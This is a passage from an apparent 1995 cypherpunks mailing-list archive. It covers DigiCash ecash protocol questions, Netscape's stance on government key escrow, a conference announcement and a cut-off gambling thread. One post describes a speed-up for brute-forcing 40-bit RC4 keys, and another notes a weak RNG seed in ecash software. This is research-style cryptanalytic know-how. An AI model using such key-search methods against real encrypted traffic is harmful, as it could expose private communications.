coin based system so you know where to cash in the coins, so I don't think this is going to go away. Of course as of now everyone has the same bank so it is not an issue. > Is it in fact the case that all coins on one payment use the same payment hash > when encrypting their signatures (the field sig in onl_coin)? The signatures are xor'd with the payment hash, but this is not the main way they are encrypted - they are then encrypted with the bank's public key. The purpose of this xor is not so much to protect the coins as to bind them unbreakably to the payment header. Since the coins are always sent around with that payment header I think they all do use the same payment hash. > If (M,e) is the mint's public modulus/exponent, and (N,h) is public mod/exp > for a particular coin denomination, are the following statements true: > > o If n is the coin number (in onl_coin, assumedly the same n as used in the > withdraw request), and hdr is the first part of the payment header, > then sig (in onl_coin) equals > > ([ SHA(hdr) XOR ((f(n)^(1/h)) mod N) ] ^ e) mod M I was wondering about this too. There is a reblocking problem in trying to concatentate "pure RSA" operations. In particular M must be at least as big as N. This is not necessarily a problem, but it is a slightly unusual constraint on key creation. However I agree overall that this formula is a reasonable reading of the doc. > o A deposit (which contains a userID in the userhdr, a payment_hdr in > the dep record, and a pair (n,sig) for each coin) is accepted by the bank iff > > ([ SHA(payment_hdr) XOR ((sig^(1/e)) mod M) ] ^ h) mod N = f(n) > > _and_ either payment_hdr.shop_accID corresponds to userID, > or a payer_code is supplied such that > payment_hdr.payer_hash = f(payer_code). There also needs to be some clause for the "@" payee. In that case I think the payment is accepted if the signature checks, with credit to the userID account. That business about cancelling via payer_code I agree is not very sensible. It doesn't seem necessary - the coin can just be re-spent, made out to someone else. > Where is the facility for tracing double spenders? Perhaps it's just > part of the "incomplete" part of the document, but I can't even see > where it would fit in to what we've got; neither the withdrawal nor the > payment messages seem to encode _any_ information about the payer in > the coins, and the bank cannot seem to know who withdrew the coin that > ended up being spent twice (due to the blinding). There is no such thing! This is one of the most common misconceptions. This version of ecash does not trace double spenders. It prevents double spending by checking each coin to make sure it has not already been spent. Tracing of double spending is only necessary in offline systems where coins are not checked right away, but that is not present here. > Is there a way to change the public key associated with an account? > Is it just a meeter of sending another OPENACC1 message? My guess is there would need to be some manual intervention to do this. > Exactly what kind of anonymity/privacy/security does ecash offer? > Let's examine who knows what. > [...] > If Eve or Mitch can determine either r (the blinding factor) used in > the withdrawal, or the payer_code, used in the payment, they can steal the > money. This has ramifications to Doug's "agnostic" banks; more security > has to be added to the present ecash system if unblinded withdrawals are > allowed. This also brings up the "Netscape" question: how are these numbers > generated? Does it have to do with that 25 character string you enter > at the beginning? I've noticed a bit in the program that seeds a RNG with > (time(0) ^ ((getpid()<<16)|getuid())). I think publication of _at least_ > the code pertaining to blinding factor and payer_code generation is > _absolutely vital_. Well, as I said, I think this payer_code business is pretty questionable. I'm sure the next version of the doc will clear that up a great deal. As far as determining r, that is not possible from the protocol messages. Chaum has proven that it is absolutely indeterminate. So I don't understand what you mean about "more security has to be added to the present ecash system if unblinded withdrawals are allowed." Do you just mean that the coin messages should not be sent in the clear in that case? I observed that coin withdrawal messages can be sent in the clear in some postings I made last year - the use of r effectively encrypts them. But of course that can't be done with unblinded messages. There have been claims that the long string you type in at startup time deterministically seeds the RNG, so that if you lose your wallet but you tell DigiCash this string (via some secure channel, presumably) they can reconstruct the coins you should have. Presumably they could figure out what the r values were when you withdrew all your coins, reconstruct the coin numbers, and see which ones haven't been spent. This is both good and bad, in that it provides a well understood amount of entropy (rather than relying on whatever it can scrounge up), but of course is vulnerable to lazy typing. Also, you have to write down the string, and if someone found this they could perhaps get your coins. > I think I'll stop here; comments from anyone, and especially answers to my > questions from DigiCash people, are welcome. I'm sorry if it's not as > complete as you (or I) would like; I'm quite tired, as my building had > two fire alarms in a row at 3am this morning... > > - Ian "Well, it's a start..." Very good comments. I'm sure the next version will be much better if they are careful to clear up the kinds of issues you have raised. Hal From froomkin at law.miami.edu Sat Dec 2 19:57:38 1995 From: froomkin at law.miami.edu (Michael Froomkin) Date: Sun, 3 Dec 1995 11:57:38 +0800 Subject: Questions/Comments on ecash protocol In-Reply-To: <199512030127.RAA03496@cory.EECS.Berkeley.EDU> Message-ID: thank you for the sterling analysis. I for one am following this with enormous interest, even though some of the details are lost on me right now. I can't recall if you were party to the earlier thread on "digital coin launderies", and I know some of it was off line. I hope you will keep some of the following in mind as you go. One of the major questions about digicash/MTB$ is whether and how money might be laundered. The question subsumes the following (among others): 1) What information about Charlie/customer is encoded onto the coin? (There must be some, right, since the serial number is blinded?) Since the bank doesn't know what serial number it is signing, it needs to put info about Charlie onto the coin so that it can track him down if he double spends. Lacking such info, the bank can refuse to honor a double-spent coin, but has no way to know who the double-spender is. 2) How does Charlie (customer) software store the coin internally? 3) Is there a way [how hard is it] for charlie to extract a coin and either (i) copy it and/or (ii) send it to David [3rd party] in such a way that David could insert it into David's MTB software and then spend it to Sam without Sam or the Bank noticing that anything was wrong. If Charlie and David do this, David now has a coin that is from his point of view both payee and payor anonymous, although Charlie has a risk that David will double-spend and expose Charlie to the bank's wrath. 4) what information if any is encoded onto a coin when Charlie spends it to Sam? A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's warm here. From rmarquis at umich.edu Sun Dec 3 12:02:58 1995 From: rmarquis at umich.edu (Robert Marquis, Jr.) Date: Sun, 3 Dec 95 12:02:58 PST Subject: Questions Message-ID: Hello. I was wondering if anyone would be able to help me out. I am writing a research paper and I need some interviews for it. If you could answer any of these questions about security, I would greatly appreciate it. Thanks for your time. --Bob Marquis Please send responses to rmarquis at umich.edu - How can PGP help secure something like e-mail? - Are there any encryption schemes which are "unbreakable"? - What would someone need to do to send an e-mail message which cannot be read or altered by anyone else, or is it not possible? ____________________________________________ Robert Marquis, Jr. University of Michigan - Dearborn e-mail: rmarquis at umich.edu www: http://www.umd.umich.edu/~rmarquis From ahupp at primenet.com Sat Dec 2 20:08:28 1995 From: ahupp at primenet.com (Adam Hupp) Date: Sun, 3 Dec 1995 12:08:28 +0800 Subject: The future will be easy to use Message-ID: <199512030330.UAA22240@usr1.primenet.com> >That's today's method, more or less. It doesn't address my needs. The >name you pick for your key may or may not mean anything to me. It might be >pronounceable, giving it some advantage over a radix-64 string, but it >might also be non-unique, making it worthless as an identifier. > >What means something to me is whatever name (or symbol) I assign to the >person behind the key in question. That's the one in my mind and therefore >the only one of interest to me. You, however, don't know what's in my >mind. You don't even know my preferred symbol set. > Why not give it two names? A local name that could be a icon or something, and a universal name (i.e. MD5 hash of key) -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQBtAzCNppQAAAEDALhWZl7IuGZ9zZT5bACo0b/1L0Nv0C72vKHIO3IHh+cwpHHa 2Ozb9aeO0UvXGwkkZIYgUm0EvmzKh7yb1GTLvBp5kXpR3I9w+Yj4LGlBDERpUWw6 x4ED49pwDnz1Hl5FBQAFEbQYYXNoIDxhaHVwcEBwcmltZW5ldC5jb20+ =PtJK -----END PGP PUBLIC KEY BLOCK----- From lyalc at ozemail.com.au Sat Dec 2 20:09:54 1995 From: lyalc at ozemail.com.au (lyal collins) Date: Sun, 3 Dec 1995 12:09:54 +0800 Subject: bulk RC4 brute forcing Message-ID: <199512030356.OAA17497@oznet02.ozemail.com.au> Some time ago, I wrote about testing multiple plain/cipher pairs against a key as a possible speed up for brute forcing 40 bit RC4 key cracking. I have finally done something about it, written some code, and run tests which I believe gives a about 6-8 times improvement over single key/plain/cipher testing against RC4-40 encryption. Basically: A single RC4 master "key schedule" is generated. This is copied to an master array of 126 RC4_keys (126 chosen due to segment boundary probs). Then each of 126 plain/cipher (P/C) pairs are tested for a match. Acquiring the plain/cipher pairs in real life is another question. If a match is found, the pair is marked 'found', and testing continues on the remaining unfound P/C pairs. This loops until all 126 plain/cipher/keys have been tested and found. 8 plaintext, 8 cipher bytes are used. Keys are 8 bytes, the last 5 of which are variable (40 bits). Test results : A test set of data was created by incrementing a key byte, and making a P/C pair. Then all keys bytes are set to 0, and testing commenced. Typically, a 486/33 with the above in 'C' code running on DOS achieves about 15000 tests per second. One extended test ran about 480 million tests in 7.5 hours and found 68% of the keys - approx 17,700/sec, averaging 5.6 million tests per found key. My reasoning follows thus: For 126 plain/cipher pairs, with "randomly" generated keys, one valid key/plain/cipher pairs 'should' be located in 2^33 key tries (126 is approx. 2^7) 15000 tests/sec across 126 P/C pairs is about 119 keys/second tested. at 119/second, 2^33 key tests will take 835 days. This should "guarantee" a key match is found. By contrast: The "bruterc4.c" code used by this forum earlier showed approximately 2200 key tests per second on my machine. Testing 2^40 keys at 2200/sec will take 5784 days to guarantee a key match (using 2^39, 2892 days). This is a 6.9(3.46) ratio, that finds a single key match. Finding all 126 keyswould should take approximately 293 years in "bulk" mode, or 1996 years in single mode (126x5784 days). The code is available, and will be posted here is desired (it is messy). Ideally, faster key/plain/cipher testing could be accomplished if a larger array of keys could be used. The Intel segment problem has prevented me for making larger arrays - I don't know how to turn these features in my compiler (yes - I am a beginner at coding, but the "huge" directive in Borland C did not seem to work, and I don't know why - yet). Tests on 31, 63 and 126 P/C pairs showed results of 10689, 13326 and 15689 tests/sec, respectively. This indicates array size has a direct relationship with test/sec. I invite others who can better manipulate statistics, or better exeprienced, to comment, refute, or otherwise contribute to this. lyal All mistakes in this message belong to me - you should not use them! From cp at proust.suba.com Sun Dec 3 12:21:29 1995 From: cp at proust.suba.com (Alex Strasheim) Date: Sun, 3 Dec 95 12:21:29 PST Subject: Jim Clark, "Mr. Bubble" In-Reply-To: <199512031807.TAA07090@utopia.hacktic.nl> Message-ID: <199512032022.OAA02418@proust.suba.com> > >I don't expect Netscape, as a corporate citizen, to engage in civil > >disobedience. But I hope that Netscape will take seriously its obligation > >to protect the rights of citizens. > > I do. I regard the capacity to do so as crucial, and I regard the > fact that you *don't* expect them to as very telling. As has been pointed > out extensively, the chances that he'll manage to hang on to his > soft-earned cash until he can sell out are a long shot--unless he takes a > stand against GAK. I don't know much about the market. I can't say whether or not the market will continue to value Netscape at $5 billion -- I never believed it would happen in the first place. If I walked outside and saw the skies filled with pigs, and then you asked me when pigs will stop flying, I'd have to say, "I don't know." It's a lot easier to answer, "when will pigs fly?" than, "when will pigs stop flying?" It seems likely to me that the bubble's going to pop one way or another, but again, I don't really know what I'm talking about. But I don't think Netscape can approach their business that way anyway. The market is going to do what it wants, and all they can do is try to sell browsers and servers. > Governmental policy on the subject of crypto has relied > upon secrecy, obscurity, and above all terrorizing individuals; the gov't > would be extremely reluctant to throw the book Netscape, given its > symbolic significance in the market. And even if it did, Clark's future > would be assured--maybe after he got out of Club Fed, but assured > nonetheless. Clark's future is already assured. So what if the bubble pops? If Netscape lost 90% of its value it would still be valuable. The only time $500 million doesn't look like an awful lot of money is when you compare it to $5 billion. You're not seriously expecting Clark to expose himself to the risk of jail time, are you? > Let me be clear: if Clark and Netscape said "We're implementing and > releasing a version with a key length we support," crypto policy would be > the lead story on the evening news--and the gov't would lose. The only > question is how fast. I agree with you that the government will lose a public debate about GAK and crypto export. I just don't believe that defying the law is the way to go, more more accurately, that there's a snowball's chance in hell that Netscape would do it. If you want to talk about what would pop the bubble the quickest, running around like a loose cannon and defying the law would have to be right up there. > >The decison that Netscpae is faced with now is a big one. It's going to > >have widespread and long lasting consequences for privacy and civil > >liberties all over the world. When you look at what's going to happen on [...] > You set forth all these silly generalities as though they suggest > that NS's best bet--for Clark, for itself, for the public--is to go along > with US policy? Bullshit. Their best bet is to use their golden-boy status > to sucker punch the gov't. Your criticism of what I wrote is valid, to a certain extent. I was making general and simplistic arguments. Sometimes they're the best arguments. Read the Contract with America or watch some of the "Why We Fight" movies. And I'm not laying any claims to saying anything new here. I'm not contributing anything in the way of analysis. On the contrary, all I'm doing is pointing out the obvious. There are two degrees of victory here. The first is to have access to strong crypto, legal or not. That's already won. If you've got a copy of Applied Cryptography, you can pretty much do whatever you want. There's a lot of code out there, good tools exist and are easily aquired. Sameer has an apache ssl server that you can use instead of Netscape's commerce server, and there are modified Mosaics that will talk to it. The battle we're fighting now is for legal access to strong crypto, and an understanding on the part of the government that software engineers ought to be able to build strong and secure international systems without harassment. You want some more platitudes? The export restrictions on crypto are bad for business and they're not going to prevent the bad guys from communicating securely. The genie is out of the bottle. Crypto is rapidly becoming a tool that's essential to the operation of even the most mundane business. It's simply unrealistic to treat crypto as a munition in a day and age when (a) everyone knows how it works, (b) there are many thousands of people all over the world who have the ability to write good crypto code, and (c) you have to use crypto to conduct your business. The ITAR, as it relates to crypto, is hurting America's ability to compete in international markets. As more commerce moves online the damage inflcted by ITAR will intensify drastically. If Netscape takes that argument to the business community, they'll be supported, because it's reasnable and because it's the truth. This isn't just about Netscape. It's going to affect Sun, AT&T, Microsoft, Oracle, and countless smaller companies. It's going to affect the ability of GM to communicate internationally without falling victim to corporate espionage. We're not selling snake oil here. The cypherpunk position on crypto is good for companies like Netscape, it's good for the economy gererally, and it's good for the political health and general well being of the republic. > > 1 Netscape will follow all laws and regulations. > > 2 The current rules are forcing Netscape to choose > > between providing reasonable levels of privacy > > to its customers and competing in the international > > marketplace. > > 3 Netscape feels the rules should be changed to make > > this choice unnecessary. I still believe this is the winning argument, and that both the public's and Netscape's interest will be served if they make it publicly and forcefully. > 1 Make illegal software available by FTP > 2 Explain it's doing so because ITAR is bullshit > 3 Face the gov't down in the press and in the courts Go for it. We're behind you 100%. From hfinney at shell.portal.com Sat Dec 2 20:22:18 1995 From: hfinney at shell.portal.com (Hal) Date: Sun, 3 Dec 1995 12:22:18 +0800 Subject: Info on Netscape's key escrow position Message-ID: <199512030408.UAA19830@jobe.shell.portal.com> I will join the chorus of criticism: From: Jeff Weinstein , quoting Jim Clark: > I said that if we are to use this encryption technology in business, we must > have a better solution than to limit keylength or put keys in escrow. I don't understand this. What is the better solution? No other solution seems to be discussed by Clark. Most of his message is devoted to rationalizing the inevitable changeover to key escrow, which he just dismissed as unacceptable. > All > governments of the world have a valid concern about terrorism and other > activities of concern to the security of their nations. All of them will > continue to restrict our ability to provide products to their markets unless > we build in some mechanism that allows them to legally access > information that is in the interest of their national security. This isn't true! The US government (and I believe most other Western governments, France excepted) does not presently provide any restrictions on providing products to US citizens which have strong cryptography. There are serious constitutional questions about whether it could ever do so. Clark's message seems to be based on the assumption that legal restrictions on crypto are a fait accompli. Nothing could be further from the case. What makes me mad is that his messages seems to promote an attitude which could increase the likelihood of these kinds of restrictions. If people think the battle is already lost, they will be less likely to fight. IMO this is going to be a big, knockdown fight and the eventual outcome is far from certain. > A lot of ordinary citizens are rightly concerned about their own privacy. I > am one of them. I do not want the government to snoop on me, but in fact the > government, through the FBI, can now tap my phone without my knowing it by > simply getting sufficient evidence that I am conducting illegal activities, > then presenting this evidence to a court to get permission. I have no say in > the matter. Again Clark is preaching acquiescence. We have no say in the matter. Our phones can be tapped any time the FBI wants. What is the relevance of this to the issue of network communications privacy? Doesn't this again sound like a justification for giving up the battle before it is joined? Where is his righteous indignation? Where is the recognition that the right to tap communications is not granted by God but an accident of technology, one which can be taken away by technological progress as easily as it was granted? > If we as a company were to take the position that in no case will we allow > a government to get access to our encrypted messages, or refuse to allow > key escrow with our products, the governments of the world will quickly put > us out of business by outlawing the sale of our products in their countries. False! I can open a company today in this country and take exactly that position, and the US government will NOT put me out of business. What country is Clark living in? > The fundamental issue is how do we accommodate the requirements of governments, > while protecting our rights as citizens. As I wrote in another context, when a question is framed in terms of conflicts between the rights of governments and citizens, it is based on a totally misguided premise. There are no conflicts between the rights of governments and citizens in our country. The only rights are those of citizens. The real issue is the conflict between the rights of the citizens to privacy and freedom versus their right to security and safety. I think we all know what Ben Franklin had to say about that. > None of this represents the position of Netscape with respect to what we > will do. But if we do not come up with a solution to this problem that is > acceptable to each government, we will not be able to export our products, > except with a short key length (e.g. 40 bit keys), and that will not be > acceptable to corporate customers in other countries. They will create their > own solution, and we will not be able to sell to a larger world market. In > fact, we could even be ordered by our own government to establish a key > escrow system for its use inside the US. Again Clark attempts to anticipate the advent of a totalitarian style system of controls on access to cryptography in this country. Should we really base our policies on the assumption that this will actually happen? Will the American people stand by for such an unprecedented invasion of privacy? Some governments are capable of all kinds of evil restrictions on products. Is Netscape committed to building in provisions so that their software won't access sites owned by Jews, so they can sell in Arab countries? Obviously they will draw a line somewhere. I urge them to consider the moral issues involved in endorsing Big Brother GAK systems before accepting them as just another cost of doing business. > I chair an industry group called the "Global Internet Project", with members > from almost twenty companies, including companies from Asia and Europe. This > was the central issue we all agreed upon this morning, and we are putting > together a policy statement whose purpose is to educate lawmakers on the > importance of quick resolution of this matter. I am afraid that what the companies really want is global consistency. That way they can use one set of policies for all countries, and no one company can get a competitive advantage over others by producing stronger privacy protections, because they will be forbidden by law to do so. Whether the policies protect freedom and privacy or not is not really relevant from this view. If this is the way things develop, I predict that it will not be acceptable to the general public. Netscape more than anyone has seen how much pressure can be brought through a public perception of weak software security. Our own brute force key hacks as well as the RNG seed problems have well demonstrated that. Do you think the same thing won't happen, only far worse, if the government tries to force weak software down people's throats? I understand that Jeff has stated that Netscape is actually opposed to GAK. It would have been nicer to hear that from Jim Clark, in unequivocal terms. The overall tone of his message, as I have pointed out above, is one of accommodation and compromise with government restrictions on the rights of free citizens to communicate securely. He almost seems to think that free strong crypto is already illegal. I think he needs to take a good hard look around and remember that he is still a free citizen of the United States. My guess is that he has spent too much time in the company of law enforcement people. He had better start trying to understand the grass roots members of his market if he wants to continue to succeed. Hal Finney hfinney at shell.portal.com From nobody at REPLAY.COM Sun Dec 3 12:24:48 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 3 Dec 95 12:24:48 PST Subject: Mr. Bubble II Message-ID: <199512032025.VAA12833@utopia.hacktic.nl> -----BEGIN PGP SIGNED MESSAGE----- Tim May, 12/3/95, 2:22 PM : >My thesis is that both Netscape and Microsoft are in positions at this time >to either do the right thing (tm) or to help build in the tools for a >police state, an Orwellian surveillance state. Gee, Tim, this is *your* thesis? >Netscape, being the dominant browser company, and Microsoft, being the >dominant OS company, are in special positions to "build in Big Brother." >I'm not claiming they are, just that they are clearly in a position to make >it technologically more feasible to make non-GAK illegal. They both need to >carefully think about the role that's been "given" to them (whether by >fortune, hard work, or being in the right place at the right time) and do >what's right. And? >Strong words, perhaps, but the implications of mandatory key escrow are Not strong at all, actually. >quite clear. We debated these points for a long time during the Clipper >debate, and later when "Software Key Escrow" began to rear its head. I >won't repeat these arguments against GAK here, but will take this >opportunity to quote from a new book that actually quotes my words: [self-congratulations deleted] >It is important that such companies as Netscape and Microsoft fully >understand that crypto policy will largely determine civil liberties in >this country and other countries for a long time to come. And they must >understand that they can influence the direction. Bill Gates, after some >early waffling, seems to now fully understand the implications of GAK and >has written persuasively against it. Jim Clark does not seem to me have >thought about it as deeply, or perhaps has views of civil liberties which >are not at odds with mandatory key escrow, the "open door policy" mentioned >above. Like many entrepreneurs, he is an opportunist in every sense, good and bad. He has yet to advance -- "graduate" maybe -- beyond that point. NS's stance re GAK is a golden opportunity for Mr. Bubble either to graduate or to get popped: either patted on the back by Papa State or popped in the noggin. When "opportunity" is at stake, he's a shrewd maneuverer; but when pitting his integrity against federal charges is at stake, he's still a kid -- he doesn't see the opportunity in it. >And time is of the essence. Things move very fast. It is no longer the case >that a law is passed, then companies respond to the new legal regime with >their own policies and products. Companies, especially in high tech, are >"partners" from the start, as we saw with the Clipper development (where >AT&T had known about Clipper for years prior to the first public >announcement, and was cooperating in the development of it, not to mention >the other companies such as Mykotronx, VLSI Technology, etc., which were >involved in secret for years). Partner, schmartner: "partners" can be adversarial, and adversarial relations can become *very* adversarial. Here's the question: is the dog gonna wag the tail or vice versa? The USG has, as we all know, demonstrated its infinite capacity to knuckle under in the face of hardened opposition, whether announced or de facto. NS is in a privileged position to drag the LEA establishment onto the mat, with the whole of the American public watching. And it stands to gain from doing so, as do we all. But Mr. Bubble wants to be friends, wants to receive genteel toasts. With the kind of money Mr. Bubble stands to make -- whether from NS or from subsequent ventures -- he should be maybe just a bit tougher. If he's looking for models, names like Carnegie and and Bismarck come to mind. (Note that their progeny *still* have money, not 2 years later but *generations* later.) >It is only sheer speculation on our part (some of us, at least) that >negotiations about GAK have been going on with the major software >companies. Jim Clark, for example, learned what he knows about key escrow >_someplace_, and it probably wasn't from our list or from articles he'd >read. I'm betting, but could of course be wrong, that he and other folks at >Netscape (and I mustn't leave out Microsoft, Sun, SGI, Apple, etc.) have >been briefed on key escrow and that various negotiations are already >underway. This would match how things were done with Clipper, and would >explain Clark's voiced support for the need for GAK. On the contrary, it is sheer speculation that negotiations about GAK *haven't* been going on. This shit doesn't happen by magic. >I hope Jeff W. and Jim C. can have some _long_ chats. The stakes are too >high for product decisions to be made without full awareness of the >implications. The statements from Jim Clark do tend to imply a kind of >defeatism, and even Jeff's comments seemed laden with qualifications about >"only if the government requires us to." As Hal Finney noted in his post, >it's as if the Netscape people are preparing for the inevitable. Maybe it's >not an indication that GAK is being considered within Netscape, but maybe >it is. After all, one rarely hears "only if we have to" qualifications on >things that are truly from out in left field. Yes. >And what Netscape agrees to put in future releases of its browsers or its >servers could have dramatic effects on the whole climate. Yes. [social darwinism deleated] >Should Netscape play ball with the NSA or refuse to cooperate? I'm not >suggesting that Netscape "break the law." Actually, there are *no* laws at >present about GAK or about the use of strong crypto within the U.S., and >most of us want to keep it that way. Thus, Jim Clark and Netscape could >strongly lobby for keeping things the way they are, and could even say "If >foreign governments demand GAK, let them build it in themselves--we will >not produce the software to run a police state." NS should implement strong crypto, make it publicly available by FTP and in a box, and see how the USG responds. The public is on its side. >And if export laws demand GAK in exported products, Netscape should "do the >right thing" and have two versions. It may add to their costs a little, but >it's better than building in the machinery for a GAK law to later be >passed. Yes. >(Explain something to me. I have never, ever understood why it is a concern >of the U.S. government that we help build in GAK for foreign governments, >that we make sure that products intended for export to France or Syria have >GAK that allows those governments to read the traffic of their citizens. >And if the concern is that exported versions of software must be readable >to the _United States_, then this is a non-starter in terms of sales in >many or even most foreign countries! I'm sure France will welcome with open >arms a version of Netscape that allows the NSA to read the traffic of >French citizens. Oh, by the way, what legal jurisdictions will be involved >in obtaining the escrowed keys of foreigners? The answers are both clear >and murky, if you catch my drift.) Because it isn't interested in freedom, here or anywhere else. It is interested in a "controlled burn" distribution of stability and instability. Its willingness to do business with its "enemies" has been amply demonstrated. But your drift is clear, and it is right. >If the U.S. insists on GAK _within the U.S._, as many of us fear is the >long-term danger, then all bets are off anyway. But I would hope that >Netscape does nothing to make it _easier_ to make this the case! On the contrary: That's when bets are on. That's when *you* -- and all of us -- might have to start putting our money and our homes in Corralitos on the line. That's when Black Unicorn will upload the papers he claims to have, when I will start wrapping PGP-encrypted mail in pretty-looking wrappers. That's when we'll have no one but ourselves to blame. Not even Netscape. >A viable thing for Netscape to do is to announce forthrightly that it will >separate the issue of export from what it sells in the U.S., that there >will be NO GAK included in any U.S.-sold packages. The quest for an "all >world" version, freely exportable, should not take precedence over the >civil liberties issues. And I predict that any slight losses in market >share or slight increases in product cost will be _less_ than the effects >Netscape will see if their product comes to be associated with "Big Brother >Inside." Yes. But NS should act first, explain second. If NS wants money, that's how to get it. >Enough for now. Yes. Hieronymous. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBMMIHhr3g0mNE55u1AQFI3QH/Y32u8ASp61MPjkaeQJJly7qwQ5BuGNYx XndZMAPBVXJjOr4Mx5BieouM5GG5WgBc1fMTTRrnAJtSHQO3dgwwBQ== =WCJS -----END PGP SIGNATURE----- From hal at martigny.ai.mit.edu Sun Dec 3 12:34:26 1995 From: hal at martigny.ai.mit.edu (Hal Abelson) Date: Sun, 3 Dec 95 12:34:26 PST Subject: Sixth Conference on Computers, Freedom, and Privacy Message-ID: <9512032034.AA10139@toad.com> Please redistribute widely **************************************** The Sixth Conference on Computers, Freedom, and Privacy will take place at the Massachusetts Institute of Technology on March 27-30, 1996. CFP96 is hosted by MIT and by the World Wide Web Consortium. Since its inception in 1991, the series of CFP conferences has brought together experts and advocates from the fields of computer science, law, business, public policy, law enforcement, government, and many other areas to explore how computer and telecommunications technologies are affecting freedom and privacy. Registration for CFP96 will open on December 8. Conference attendance will be limited. Due to the enormous public interest in CFP issues over the past year, we encourage you to register early. SPECIAL NOTE TO STUDENTS: There are a limited number of places available at a special student rate. These will be allotted on a first-come first-served basis, so register as soon as possible. Events planned for this year's conference include: - Federal prosecutors square off against civil-liberties lawyers in a Supreme Court test of the "Cryptography Control Act of 1996", which criminalizes non-escrowed encryption. - Authors Pat Cadigan, Tom Maddox, Bruce Sterling, and Vernor Vinge divine the future of privacy. - College administrators, students, lawyers, and journalists role-play scenarios that plumb the limits of on-line expression on campus networks. - Panels on international issues in privacy and encryption; on the struggle to control controversial content on the Internet; on tensions between copyright of digital information and freedom of expression; on threats posed by electronic money to law enforcement, privacy, and freedom; on mass communication versus mass media. You can register for CFP96, starting December 8, by US Mail, by fax, or via the World Wide Web. For more information, see the CFP96 Web page at http://web.mit.edu/cfp96 or send a blank email message to cfp96-info at mit.edu From ddt at lsd.com Sat Dec 2 20:41:42 1995 From: ddt at lsd.com (Dave Del Torto) Date: Sun, 3 Dec 1995 12:41:42 +0800 Subject: a foot here, a foot there -- pretty soon your mouth is *really* full (was: Re:Netscape, Corporations, and GAK Support) Message-ID: At 11:36 AM 11/30/95, Timothy C. May wrote: >It's possible that Jim Clark--whose quotations I have not yet seen denied >by Netscape--is merely naive on matters of mandated key escrow. It's >possible that he hasn't given it much thought. I watched him in acquisition mode once upon a time and I rather doubt this: I imagine that he's giving this considerable thought (he has the time while counting stacks of shares on his bed every night ;), watching this space and letting the "petty officers" navigate through this reef for now. His statements so far indicate nothing more to me than that he's just playing his cards very close for now so as not to alienate anyone: this is what a captain should be expected to do when the waters are potentially this "dangerous." Why would/should he chop the Feds off at the knees until he knows exactly which way _their_ smoke blows? They're still trying to figure out what the hell we're up to, and if we can manage to stay ahead of their lumbering giants (Freeh, et alia), it'll pretty much stay that way for a long time. Anyway, no policy statements coming from Netscape NOW can be a reliable indicator of where they're going to be -- even in a year -- on crypto policy or on the internal development. All we're seeing for the forseeable future is trial balloons and other strategic positioning. I bet Jim's read the Book of Five Rings... > It's also possible that he >sincerely is supportive of plans for Big Brother to have an "escrowed" copy >of our conversations, diaries, travel plans, etc. Jim may "appear" a tad "hawkish," but he's no dope. Look, a 70% share, even with momentum behind it, can slim down mighty fast with bad choices and lots of fast dogs at his heels and he knows it. Let me put it this way: "the higher they sell, the faster they drop." Tim, you're absolutely right that speaking out NOW (and directly at him) is the surest way for him and others to have data on which to base their future decisions. If there are other solutions for modules Netscape intends to provide (like...NS2.0's Mail module + GAK vs a c-neutral Eudora with an optional MOSS translation plug-in), then he'll lose market share proportional to how much we scream about it in public (I'm doing daily vocal exercises, just in case ;). If he makes enough bad choices, like throwing his full weight behind GAK and other atrocities, he'll end up like DigiCash *would* if they kept/keep the bank protocol hidden. I just refuse to believe he hates his work that much. At the worst, I see a special "gaak" version for the Feds, but I sure as hell wouldn't buy it (and I bought my copy of Netscape). It would be nice to hear from him here directly, though. One can only tolerate so much pussyfooting around before one becomes snippy. dave ________________________________________________________________ "I prefer a _real_ whorehouse to The Theatre." --Dorothy Parker From nobody at REPLAY.COM Sun Dec 3 12:54:42 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 3 Dec 95 12:54:42 PST Subject: Jim Clark, "Mr. Bubble" Message-ID: <199512032055.VAA13990@utopia.hacktic.nl> -----BEGIN PGP SIGNED MESSAGE----- Alex Strasheim: > > 1 Make illegal software available by FTP > > 2 Explain it's doing so because ITAR is bullshit > > 3 Face the gov't down in the press and in the courts > > Go for it. We're behind you 100%. If I were worth billions, if I were the sparkle on the high-tech bubble, if I had a Major hand in engineering crucial protocols, if my company were so young that it hadn't yet had time to bog down in business as usual, I think I probably would. That's a lot of Big talk and a lot of Ifs, ain't it? But that's how it goes: I doubt he -- or anyone else -- would give as much to my LDF as I gave to his (chump change, but more than I could afford). Clark should ask himself what Rabbi Akiva put best: If not me, who? If not now, when? I do my small part, in my small way; he can do his big part, in his big way. One thing scares the spooks more than what they oppose: publicity. Hieronymous -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBMMINNr3g0mNE55u1AQFnDgH/UJgFGAW9njKTnm7FgJHMQa1J8VONag0v 5JupJbYMISWYHMZ0KbC8ts6GV9jqD7xYg9dWEHhWbFg3SHJ0CFVt6w== =Zza/ -----END PGP SIGNATURE----- From jamesd at echeque.com Sat Dec 2 21:05:12 1995 From: jamesd at echeque.com (James A. Donald) Date: Sun, 3 Dec 1995 13:05:12 +0800 Subject: FW: websurfer 4.6 (fwd) Message-ID: <199512030450.UAA06088@blob.best.net> At 11:56 AM 12/2/95 -0500, Michael Froomkin wrote: >so much for compatibility....guess I'm sticking with netscape for now. Websurfer is intolerably buggy. The latest Mosaic seems pretty good to me. > --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From cjs at netcom.com Sun Dec 3 13:07:29 1995 From: cjs at netcom.com (Christopher J. Shaulis) Date: Sun, 3 Dec 95 13:07:29 PST Subject: prototype slot-machine In-Reply-To: <199512031751.JAA01922@infinity.c2.org> Message-ID: <199512031957.OAA00168@localhost.cjs.net> > > Try this site: Offshore Infomation Services in Anguilla, > > http://www.offshore.com.ai/ > > Hey, fancy that, even though gambling is illegal in California you're > saying that on a site two feet from my desk it's legal? > > cool. Its legal until someone makes some money at it. Soon as someone makes enough to notice, then you can bet that the FBI/IRS/Dept. of Agriculture (responsible for weights and measures in many locals) and the local lottery commission are all going to come and take a piece of the action. Having a gamebling establishment is something that, in America, is reserved as a privleadge solely for the capitalist elite. If you don't 